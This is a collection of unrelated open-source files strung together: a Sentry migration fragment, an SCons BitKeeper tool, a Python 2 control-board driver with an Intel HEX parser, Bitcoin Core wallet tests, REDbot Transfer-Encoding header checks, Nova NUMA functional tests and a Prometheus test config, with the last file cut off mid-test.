'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
}, 'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
}
}
complete_apps = ['sentry']
symmetrical = True
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""SCons.Tool.BitKeeper.py
Tool-specific initialization for the BitKeeper source code control
system.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/BitKeeper.py 2014/07/05 09:42:21 garyo"
import SCons.Action
import SCons.Builder
import SCons.Util
def generate(env):
    """Add a Builder factory function and construction variables for
    BitKeeper to an Environment."""

    def BitKeeperFactory(env=env):
        """ """
        import SCons.Warnings as W
        W.warn(W.DeprecatedSourceCodeWarning, """The BitKeeper() factory is deprecated and there is no replacement.""")
        bk_action = SCons.Action.Action("$BITKEEPERCOM", "$BITKEEPERCOMSTR")
        return SCons.Builder.Builder(action=bk_action, env=env)

    # Attach the (deprecated) factory directly on the Environment.
    env.BitKeeper = BitKeeperFactory

    # Construction variables driving the $BITKEEPERCOM command line.
    env['BITKEEPER'] = 'bk'
    env['BITKEEPERGET'] = '$BITKEEPER get'
    env['BITKEEPERGETFLAGS'] = SCons.Util.CLVar('')
    env['BITKEEPERCOM'] = '$BITKEEPERGET $BITKEEPERGETFLAGS $TARGET'
def exists(env):
    """Report whether the BitKeeper executable is available in *env*."""
    detected = env.Detect('bk')
    return detected
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
unknown
|
codeparrot/codeparrot-clean
| ||
# (C) 2013 Andy McCormick, Ryan Schuster
# MIT license
# see LICENSE.txt for details
import regtran
# control board interface module
# TODO:
# factor out HEX file parsing to a separate module
def wordToByteString(word):
    """Serialize the low 16 bits of *word* as a two-character string,
    little-endian (low byte first).

    The original implementation built a string-literal source fragment and
    ran it through eval(); that is both fragile and an eval anti-pattern.
    chr() on each byte produces the identical two-character result directly.
    """
    return chr(word & 0xff) + chr((word >> 8) & 0xff)
class ControlBoard:
    """Interface to the control board over a RegTran register channel.

    The firmware exposes single-character registers; commands are issued by
    reading/writing them through self.regtran.  Payloads written to the
    state/address registers are padded to 32 characters.  This module is
    Python 2 code (print statements, has_key).
    """
    # Single-character register identifiers understood by the firmware.
    REG_STATE = 's'    # board state machine ('idle', 'program', 'sample', ...)
    REG_ADDRESS = 'a'  # target address for subsequent flash/EEPROM access
    REG_FLASH = 'p'    # flash page data
    REG_EEPROM = 'e'   # EEPROM data
    REG_TEST = 't'     # protocol test/echo register
    REG_MOTION = 'm'   # motion sample data register
    def __init__(self):
        # Underlying register-transfer protocol handler (serial transport).
        self.regtran = regtran.RegTran()
    def open(self, port, baud):
        """Open the serial channel to the board.

        NOTE(review): the third argument (2) is passed straight to
        RegTran.channelOpen; its meaning is defined by the regtran module.
        """
        self.regtran.channelOpen(port, baud, 2)
    def close(self):
        """Close the serial channel."""
        self.regtran.channelClose()
    def reset(self):
        """Reset the RegTran protocol layer."""
        self.regtran.reset()
    def protocolTest(self):
        """Read the test register; used to verify the link works."""
        return self.regtran.commandRead(ControlBoard.REG_TEST)
    def getState(self):
        """Return the board's current state string."""
        return self.regtran.commandRead(ControlBoard.REG_STATE)
    def pmodeStart(self):
        """Put the board into programming mode."""
        self.regtran.commandWrite(ControlBoard.REG_STATE, 'program'.ljust(32))
    def pmodeEnd(self):
        """Leave programming mode (return to idle)."""
        self.regtran.commandWrite(ControlBoard.REG_STATE, 'idle'.ljust(32))
    def sampleStart(self):
        """Start sampling mode."""
        self.regtran.commandWrite(ControlBoard.REG_STATE, 'sample'.ljust(32))
    def sampleEnd(self):
        """Stop sampling (return to idle)."""
        self.regtran.commandWrite(ControlBoard.REG_STATE, 'idle'.ljust(32))
    def resetSlave(self):
        """Ask the board to reset its slave device."""
        self.regtran.commandWrite(ControlBoard.REG_STATE, 'reset'.ljust(32));
    def erase(self):
        """Erase the slave's flash."""
        self.regtran.commandWrite(ControlBoard.REG_STATE, 'erase'.ljust(32))
    def writeEeprom(self, address, data):
        """Write *data* to EEPROM at *address* (address set first, then data)."""
        self.regtran.commandWrite(ControlBoard.REG_ADDRESS, wordToByteString(address).ljust(32))
        self.regtran.commandWrite(ControlBoard.REG_EEPROM, data)
    def readEeprom(self, address):
        """Read EEPROM contents at *address*."""
        self.regtran.commandWrite(ControlBoard.REG_ADDRESS, wordToByteString(address).ljust(32))
        return self.regtran.commandRead(ControlBoard.REG_EEPROM)
    def parseHexLine(self, line):
        """Parse one Intel HEX record.

        Returns (word_address, data_string) for a data record, or False for
        end-of-file records and malformed lines (an error is printed).
        The byte address from the record is halved (>> 1) to a word address.
        """
        line = line.rstrip()
        # Minimum record: ':' + count(2) + address(4) + type(2) + checksum(2).
        if len(line) < 11:
            print "invalid HEX line (too short)"
            return False
        if line[0] != ':':
            print "invalid HEX line (no start colon)"
            return False
        byteCount = int(line[1:3], 16)
        if len(line) != 2 * byteCount + 11:
            print "invalid HEX line (byte count mismatch, found ", len(line), " expected ", 2 * byteCount + 11, ")"
            return False
        address = int(line[3:7], 16)
        # Little-endian string form of the address (currently unused).
        addressString = '"\\x' + line[5:7] + '\\x' + line[3:5] + '"'
        # TODO: check address
        recordType = int(line[7:9], 16)
        # Build a quoted string literal of \xNN escapes, then eval it to get
        # the raw data bytes.  NOTE(review): eval of constructed source; the
        # input is validated hex above, but this would be cleaner without eval.
        dataString = '"'
        for i in range(byteCount):
            dataString = dataString + '\\x' + line[9 + i * 2 : 11 + i * 2]
        dataString = dataString + '"'
        data = eval(dataString)
        checksum = int(line[9 + byteCount * 2 : 11 + byteCount * 2], 16)
        # TODO: check checksum
        if recordType == 0:
            # Data record: return word address and raw data.
            return (address >> 1, data)
        elif recordType == 1:
            # End-of-file record.
            return False
        else:
            print "invalid HEX line (bad record type: ", recordType, ")"
            return False
    def writeHexFile(self, filename):
        """Parse an Intel HEX file and program its contents page by page.

        Records are grouped into pages keyed by (word_address & 0xfff0);
        each page is written by setting REG_ADDRESS then writing REG_FLASH.
        """
        f = open(filename, 'r')
        parsed = list();
        for line in f:
            new = self.parseHexLine(line)
            if new != False:
                parsed.append(new)
        pages = dict();
        for line in parsed:
            key = line[0] & 0xfff0
            if pages.has_key(key):
                # Append or prepend within the page depending on the record's
                # offset inside the page.
                if line[0] & 0x0f:
                    pages[key] = pages[key] + line[1]
                else:
                    pages[key] = line[1] + pages[key]
            else:
                # NOTE(review): both branches below store line[1] unchanged,
                # so the offset test is redundant here -- confirm intent.
                if line[0] & 0x0f:
                    pages[key] = line[1]
                else:
                    pages[key] = line[1]
        for key in pages:
            # Little-endian page address, then the page data padded with NULs.
            addrStr = '"\\x' + hex(key & 0xff)[2:].rjust(2, '0') + '\\x' + hex((key & 0xff00) >> 8)[2:].rjust(2, '0') + '"'
            self.regtran.commandWrite(ControlBoard.REG_ADDRESS, eval(addrStr).ljust(32, '\0'))
            self.regtran.commandWrite(ControlBoard.REG_FLASH, pages[key].ljust(32, '\0'))
    def readMotion(self):
        """Read the motion/sample data register."""
        return self.regtran.commandRead(ControlBoard.REG_MOTION)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there are cloned transactions with malleated scriptsigs."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class TxnMallTest(BitcoinTestFramework):
    """Exercise wallet account bookkeeping when a transaction is cloned with
    a malleated scriptSig and the clone -- not the original -- is mined."""
    def set_test_params(self):
        # Four nodes; the network is later split between nodes 1 and 2.
        self.num_nodes = 4
    def add_options(self, parser):
        parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
                          help="Test double-spend of 1-confirmed transaction")
    def setup_network(self):
        """Start the default network, then split it between nodes 1 and 2."""
        # Start with split network:
        super(TxnMallTest, self).setup_network()
        disconnect_nodes(self.nodes[1], 2)
        disconnect_nodes(self.nodes[2], 1)
    def run_test(self):
        """Fund accounts, clone/malleate a tx, mine the clone on the other
        side of the split, reconnect, and verify balances/confirmations."""
        # All nodes should start with 1,250 BTC:
        starting_balance = 1250
        for i in range(4):
            assert_equal(self.nodes[i].getbalance(), starting_balance)
            self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
        # Assign coins to foo and bar accounts:
        self.nodes[0].settxfee(.001)
        node0_address_foo = self.nodes[0].getnewaddress("foo")
        fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
        fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
        node0_address_bar = self.nodes[0].getnewaddress("bar")
        fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
        fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
        assert_equal(self.nodes[0].getbalance(""),
                     starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
        # Coins are sent to node1_address
        node1_address = self.nodes[1].getnewaddress("from0")
        # Send tx1, and another transaction tx2 that won't be cloned
        txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
        txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
        # Construct a clone of tx1, to be malleated
        rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
        clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
        clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
                         rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
        clone_locktime = rawtx1["locktime"]
        clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
        # createrawtransaction randomizes the order of its outputs, so swap them if necessary.
        # output 0 is at version+#inputs+input+sigstub+sequence+#outputs
        # 40 BTC serialized is 00286bee00000000
        pos0 = 2*(4+1+36+1+4+1)
        hex40 = "00286bee00000000"
        output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
        if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
            rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
            output0 = clone_raw[pos0 : pos0 + output_len]
            output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
            clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
        # Use a different signature hash type to sign. This creates an equivalent but malleated clone.
        # Don't send the clone anywhere yet
        tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
        assert_equal(tx1_clone["complete"], True)
        # Have node0 mine a block, if requested:
        if (self.options.mine_block):
            self.nodes[0].generate(1)
            sync_blocks(self.nodes[0:2])
        tx1 = self.nodes[0].gettransaction(txid1)
        tx2 = self.nodes[0].gettransaction(txid2)
        # Node0's balance should be starting balance, plus 50BTC for another
        # matured block, minus tx1 and tx2 amounts, and minus transaction fees:
        expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
        if self.options.mine_block: expected += 50
        expected += tx1["amount"] + tx1["fee"]
        expected += tx2["amount"] + tx2["fee"]
        assert_equal(self.nodes[0].getbalance(), expected)
        # foo and bar accounts should be debited:
        assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
        assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
        if self.options.mine_block:
            assert_equal(tx1["confirmations"], 1)
            assert_equal(tx2["confirmations"], 1)
            # Node1's "from0" balance should be both transaction amounts:
            assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
        else:
            assert_equal(tx1["confirmations"], 0)
            assert_equal(tx2["confirmations"], 0)
        # Send clone and its parent to miner
        self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
        txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
        # ... mine a block...
        self.nodes[2].generate(1)
        # Reconnect the split network, and sync chain:
        connect_nodes(self.nodes[1], 2)
        self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
        self.nodes[2].sendrawtransaction(tx2["hex"])
        self.nodes[2].generate(1)  # Mine another block to make sure we sync
        sync_blocks(self.nodes)
        # Re-fetch transaction info:
        tx1 = self.nodes[0].gettransaction(txid1)
        tx1_clone = self.nodes[0].gettransaction(txid1_clone)
        tx2 = self.nodes[0].gettransaction(txid2)
        # Verify expected confirmations
        # (tx1 is conflicted by its mined clone, hence negative confirmations)
        assert_equal(tx1["confirmations"], -2)
        assert_equal(tx1_clone["confirmations"], 2)
        assert_equal(tx2["confirmations"], 1)
        # Check node0's total balance; should be same as before the clone, + 100 BTC for 2 matured,
        # less possible orphaned matured subsidy
        expected += 100
        if (self.options.mine_block):
            expected -= 50
        assert_equal(self.nodes[0].getbalance(), expected)
        assert_equal(self.nodes[0].getbalance("*", 0), expected)
        # Check node0's individual account balances.
        # "foo" should have been debited by the equivalent clone of tx1
        assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
        # "bar" should have been debited by (possibly unconfirmed) tx2
        assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
        # "" should have starting balance, less funding txes, plus subsidies
        assert_equal(self.nodes[0].getbalance("", 0), starting_balance
                                                                - 1219
                                                                + fund_foo_tx["fee"]
                                                                -   29
                                                                + fund_bar_tx["fee"]
                                                                +  100)
        # Node1's "from0" account balance
        assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
# Standard functional-test entry point: run the scenario via the framework.
if __name__ == '__main__':
    TxnMallTest().main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
from redbot.message import headers
from redbot.speak import Note, categories, levels
from redbot.syntax import rfc7230
from redbot.type import AddNoteMethodType
class transfer_encoding(headers.HttpHeader):
    """Model of the HTTP `Transfer-Encoding` header."""
    canonical_name = "Transfer-Encoding"
    description = """\
The `Transfer-Encoding` header indicates what (if any) type of transformation has been applied to
the message body.
This differs from `Content-Encoding` in that transfer-codings are a property of the message, not of
the representation; i.e., it will be removed by the next "hop", whereas content-codings are
end-to-end.
The most commonly used transfer-coding is `chunked`, which allows persistent connections to be used
without knowing the entire body's length."""
    reference = "%s#header.transfer-encoding" % rfc7230.SPEC_URL
    syntax = rfc7230.Transfer_Encoding
    list_header = True
    deprecated = False
    valid_in_requests = True
    valid_in_responses = True

    def parse(self, field_value: str, add_note: AddNoteMethodType) -> str:
        """Parse a single Transfer-Encoding list member into a lowercased coding token."""
        # Split off the optional parameter section; no ";" means no parameters.
        pieces = field_value.split(";", 1)
        coding = pieces[0].lower()
        param_str = pieces[1] if len(pieces) == 2 else ""
        params = headers.parse_params(param_str, add_note, True)
        # Transfer-coding parameters have no defined meaning; flag them.
        if params:
            add_note(TRANSFER_CODING_PARAM)
        return coding

    def evaluate(self, add_note: AddNoteMethodType) -> None:
        """Emit notes for codings REDbot didn't ask for and for pointless 'identity'."""
        surprise = {coding for coding in self.value
                    if coding not in ("chunked", "identity")}
        if surprise:
            add_note(TRANSFER_CODING_UNWANTED, unwanted_codings=", ".join(surprise))
        if "identity" in self.value:
            add_note(TRANSFER_CODING_IDENTITY)
class TRANSFER_CODING_IDENTITY(Note):
    # Informational note: the 'identity' transfer-coding is a no-op token.
    category = categories.CONNECTION
    level = levels.INFO
    summary = "The identity transfer-coding isn't necessary."
    # Fixed wording: the old text said "so it's necessary", contradicting the
    # summary, and misspelled "transfer-coding".
    text = """\
HTTP defines _transfer-codings_ as a hop-by-hop encoding of the message body. The `identity`
transfer-coding was defined as the absence of encoding; it doesn't do anything, so it isn't necessary.
You can remove this token to save a few bytes."""
class TRANSFER_CODING_UNWANTED(Note):
    # Emitted by transfer_encoding.evaluate() for any coding other than
    # "chunked" or "identity" (codings the client did not request via TE).
    category = categories.CONNECTION
    level = levels.BAD
    summary = "%(response)s has unsupported transfer-coding."
    text = """\
%(response)s's `Transfer-Encoding` header indicates it has transfer-codings applied, but REDbot didn't
ask for it (or them) to be.
They are: `%(unwanted_codings)s`
Normally, clients ask for the encodings they want in the `TE` request header. Using codings that
the client doesn't explicitly request can lead to interoperability problems."""
class TRANSFER_CODING_PARAM(Note):
    # Emitted by transfer_encoding.parse() whenever a coding carries
    # ";"-separated parameters.
    category = categories.CONNECTION
    level = levels.WARN
    summary = "%(response)s had parameters on its transfer-codings."
    text = """\
HTTP allows transfer-codings in the `Transfer-Encoding` header to have optional parameters, but it
doesn't define what they mean.
%(response)s has encodings with such parameters; although they're technically allowed, they may
cause interoperability problems. They should be removed."""
class TransferEncodingTest(headers.HeaderTest):
    # Plain "chunked" parses cleanly with no notes.
    name = "Transfer-Encoding"
    inputs = [b"chunked"]
    expected_out = ["chunked"]
    expected_err = [] # type: ignore
class TransferEncodingParamTest(headers.HeaderTest):
    # A coding with parameters keeps the coding but triggers the param note.
    name = "Transfer-Encoding"
    inputs = [b"chunked; foo=bar"]
    expected_out = ["chunked"]
    expected_err = [TRANSFER_CODING_PARAM]
class BadTransferEncodingTest(headers.HeaderTest):
    # Malformed token: fails syntax AND is treated as an unwanted coding.
    name = "Transfer-Encoding"
    inputs = [b"chunked=foo"]
    expected_out = ["chunked=foo"]
    expected_err = [headers.BAD_SYNTAX, TRANSFER_CODING_UNWANTED]
class TransferEncodingCaseTest(headers.HeaderTest):
    # Codings are case-insensitive: parse() lowercases them.
    name = "Transfer-Encoding"
    inputs = [b"chUNked"]
    expected_out = ["chunked"]
    expected_err = [] # type: ignore
class TransferEncodingIdentityTest(headers.HeaderTest):
    # "identity" is accepted but flagged as unnecessary.
    name = "Transfer-Encoding"
    inputs = [b"identity"]
    expected_out = ["identity"]
    expected_err = [TRANSFER_CODING_IDENTITY]
class TransferEncodingUnwantedTest(headers.HeaderTest):
    # Any coding other than chunked/identity is unwanted.
    name = "Transfer-Encoding"
    inputs = [b"foo"]
    expected_out = ["foo"]
    expected_err = [TRANSFER_CODING_UNWANTED]
class TransferEncodingMultTest(headers.HeaderTest):
    # Multiple header instances are combined; identity still gets its note.
    name = "Transfer-Encoding"
    inputs = [b"chunked", b"identity"]
    expected_out = ["chunked", "identity"]
    expected_err = [TRANSFER_CODING_IDENTITY]
class TransferEncodingMultUnwantedTest(headers.HeaderTest):
    # Several unknown codings collapse into a single unwanted-coding note.
    name = "Transfer-Encoding"
    inputs = [b"chunked", b"foo", b"bar"]
    expected_out = ["chunked", "foo", "bar"]
    expected_err = [TRANSFER_CODING_UNWANTED]
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (C) 2015 Red Hat, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
import fixtures
from oslo_config import cfg
from oslo_log import log as logging
from nova.tests.functional.test_servers import ServersTestBase
from nova.tests.unit import fake_network
from nova.tests.unit.virt.libvirt import fake_libvirt_utils
from nova.tests.unit.virt.libvirt import fakelibvirt
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class NumaHostInfo(fakelibvirt.HostInfo):
    """Fake libvirt host info that lazily generates a NUMA topology."""

    def __init__(self, **kwargs):
        super(NumaHostInfo, self).__init__(**kwargs)
        self.numa_mempages_list = []

    def get_numa_topology(self):
        """Return the host topology, building and caching it on first call."""
        if not self.numa_topology:
            self.numa_topology = self._gen_numa_topology(
                self.cpu_nodes, self.cpu_sockets, self.cpu_cores,
                self.cpu_threads, self.kB_mem)
            # Recompute the number of active CPUs from the generated cells.
            cells = self.numa_topology.cells
            total_cpus = len(cells) * len(cells[0].cpus)
            self.cpus = total_cpus - len(self.disabled_cpus_list)
        return self.numa_topology

    def set_custom_numa_toplogy(self, topology):
        # NOTE(review): the method name keeps its historical misspelling
        # ("toplogy") so existing callers keep working.
        self.numa_topology = topology
class NUMAServersTest(ServersTestBase):
    """Functional tests for booting servers with NUMA topology requests,
    backed entirely by fakelibvirt (no real hypervisor)."""

    def setUp(self):
        super(NUMAServersTest, self).setUp()
        # Replace libvirt with fakelibvirt
        self.useFixture(fixtures.MonkeyPatch(
            'nova.virt.libvirt.driver.libvirt_utils',
            fake_libvirt_utils))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.virt.libvirt.driver.libvirt',
            fakelibvirt))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.virt.libvirt.host.libvirt',
            fakelibvirt))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.virt.libvirt.guest.libvirt',
            fakelibvirt))
        self.useFixture(fakelibvirt.FakeLibvirtFixture())

    def _setup_compute_service(self):
        # Compute is started per-test inside _run_build_test instead.
        pass

    def _setup_scheduler_service(self):
        """Start the scheduler with NUMATopologyFilter added to the filters."""
        self.flags(compute_driver='nova.virt.libvirt.LibvirtDriver')
        self.flags(scheduler_driver='nova.scheduler.'
                                    'filter_scheduler.FilterScheduler')
        self.flags(scheduler_default_filters=CONF.scheduler_default_filters
                   + ['NUMATopologyFilter'])
        return self.start_service('scheduler')

    def _run_build_test(self, flavor_id, filter_mock, end_status='ACTIVE'):
        """Boot a server with *flavor_id*, assert the NUMA filter was
        consulted, and wait for the server to reach *end_status*."""
        self.compute = self.start_service('compute', host='test_compute0')
        fake_network.set_stub_network_methods(self.stubs)
        # Create server
        good_server = self._build_server(flavor_id)
        post = {'server': good_server}
        created_server = self.api.post_server(post)
        LOG.debug("created_server: %s", created_server)
        self.assertTrue(created_server['id'])
        created_server_id = created_server['id']
        # Validate that the server has been created
        found_server = self.api.get_server(created_server_id)
        self.assertEqual(created_server_id, found_server['id'])
        # It should also be in the all-servers list
        servers = self.api.get_servers()
        server_ids = [s['id'] for s in servers]
        self.assertIn(created_server_id, server_ids)
        # Validate that NUMATopologyFilter has been called
        self.assertTrue(filter_mock.called)
        found_server = self._wait_for_state_change(found_server, 'BUILD')
        self.assertEqual(end_status, found_server['status'])
        self._delete_server(created_server_id)

    def _get_topology_filter_spy(self):
        """Return a mock that wraps NUMATopologyFilter.host_passes so calls
        can be observed without changing filtering behaviour."""
        host_manager = self.scheduler.manager.driver.host_manager
        numa_filter_class = host_manager.filter_cls_map['NUMATopologyFilter']
        host_pass_mock = mock.Mock(wraps=numa_filter_class().host_passes)
        return host_pass_mock

    @mock.patch('nova.virt.libvirt.LibvirtDriver._create_image')
    def test_create_server_with_numa_topology(self, img_mock):
        """A 2-node NUMA flavor boots successfully on a 2-node host."""
        host_info = NumaHostInfo(cpu_nodes=2, cpu_sockets=1, cpu_cores=2,
                                 cpu_threads=2, kB_mem=15740000)
        fake_connection = fakelibvirt.Connection('qemu:///system',
                                                 version=1002007,
                                                 hv_version=2001000,
                                                 host_info=host_info)
        # Create a flavor
        extra_spec = {'hw:numa_nodes': '2'}
        flavor_id = self._create_flavor(extra_spec=extra_spec)
        host_pass_mock = self._get_topology_filter_spy()
        # contextlib.nested() is deprecated since Python 2.7 and removed in
        # Python 3; a single multi-manager "with" statement is equivalent.
        with mock.patch('nova.virt.libvirt.host.Host.get_connection',
                        return_value=fake_connection), \
                mock.patch('nova.scheduler.filters'
                           '.numa_topology_filter.NUMATopologyFilter.host_passes',
                           side_effect=host_pass_mock) as filter_mock:
            self._run_build_test(flavor_id, filter_mock)

    @mock.patch('nova.virt.libvirt.LibvirtDriver._create_image')
    def test_create_server_with_numa_fails(self, img_mock):
        """Requesting 2 NUMA nodes on a 1-node host ends in ERROR."""
        host_info = NumaHostInfo(cpu_nodes=1, cpu_sockets=1, cpu_cores=2,
                                 kB_mem=15740000)
        fake_connection = fakelibvirt.Connection('qemu:///system',
                                                 version=1002007,
                                                 host_info=host_info)
        # Create a flavor that asks for more NUMA nodes than the host has.
        extra_spec = {'hw:numa_nodes': '2'}
        flavor_id = self._create_flavor(extra_spec=extra_spec)
        host_pass_mock = self._get_topology_filter_spy()
        with mock.patch('nova.virt.libvirt.host.Host.get_connection',
                        return_value=fake_connection), \
                mock.patch('nova.scheduler.filters'
                           '.numa_topology_filter.NUMATopologyFilter.host_passes',
                           side_effect=host_pass_mock) as filter_mock:
            self._run_build_test(flavor_id, filter_mock, end_status='ERROR')
|
unknown
|
codeparrot/codeparrot-clean
| ||
scrape_configs:
- job_name: node
scrape_protocols: ["OpenMetricsText1.0.0", "PrometheusProto", "OpenMetricsText1.0.0"]
static_configs:
- targets: ['localhost:8080']
|
unknown
|
github
|
https://github.com/prometheus/prometheus
|
config/testdata/scrape_config_files_scrape_protocols2.bad.yml
|
#!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test account RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount
- listaddressgroupings
- setaccount
- sendfrom (with account arguments)
- move (with account arguments)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class WalletAccountsTest(BitcoinTestFramework):
    """Exercise the account-related wallet RPCs on a single node.

    Covers getaccountaddress, getaddressesbyaccount, listaddressgroupings,
    setaccount, sendfrom and move (see module docstring).
    """

    def set_test_params(self):
        # One node, starting from an empty regtest chain.
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.extra_args = [[]]

    def run_test(self):
        """Run the full account-RPC scenario; each phase is commented below."""
        node = self.nodes[0]
        # Check that there's no UTXO on any of the nodes
        assert_equal(len(node.listunspent()), 0)
        # Note each time we call generate, all generated coins go into
        # the same address, so we call twice to get two addresses w/50 each
        node.generate(1)
        node.generate(101)
        assert_equal(node.getbalance(), 100)
        # there should be 2 address groups
        # each with 1 address with a balance of 50 Bitcoins
        address_groups = node.listaddressgroupings()
        assert_equal(len(address_groups), 2)
        # the addresses aren't linked now, but will be after we send to the
        # common address
        linked_addresses = set()
        for address_group in address_groups:
            assert_equal(len(address_group), 1)
            assert_equal(len(address_group[0]), 2)
            assert_equal(address_group[0][1], 50)
            linked_addresses.add(address_group[0][0])
        # send 50 from each address to a third address not in this wallet
        # There's some fee that will come back to us when the miner reward
        # matures.
        common_address = "msf4WtN1YQKXvNtvdFYt9JBnUD2FB41kjr"
        txid = node.sendmany(
            fromaccount="",
            amounts={common_address: 100},
            subtractfeefrom=[common_address],
            minconf=1,
        )
        tx_details = node.gettransaction(txid)
        fee = -tx_details['details'][0]['fee']
        # there should be 1 address group, with the previously
        # unlinked addresses now linked (they both have 0 balance)
        address_groups = node.listaddressgroupings()
        assert_equal(len(address_groups), 1)
        assert_equal(len(address_groups[0]), 2)
        assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
        assert_equal([a[1] for a in address_groups[0]], [0, 0])
        node.generate(1)
        # we want to reset so that the "" account has what's expected.
        # otherwise we're off by exactly the fee amount as that's mined
        # and matures in the next 100 blocks
        node.sendfrom("", common_address, fee)
        amount_to_send = 1.0
        # Create accounts and make sure subsequent account API calls
        # recognize the account/address associations.
        accounts = [Account(name) for name in ("a", "b", "c", "d", "e")]
        for account in accounts:
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)
        # Send a transaction to each account, and make sure this forces
        # getaccountaddress to generate a new receiving address.
        for account in accounts:
            node.sendtoaddress(account.receive_address, amount_to_send)
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)
        # Check the amounts received.
        node.generate(1)
        for account in accounts:
            assert_equal(
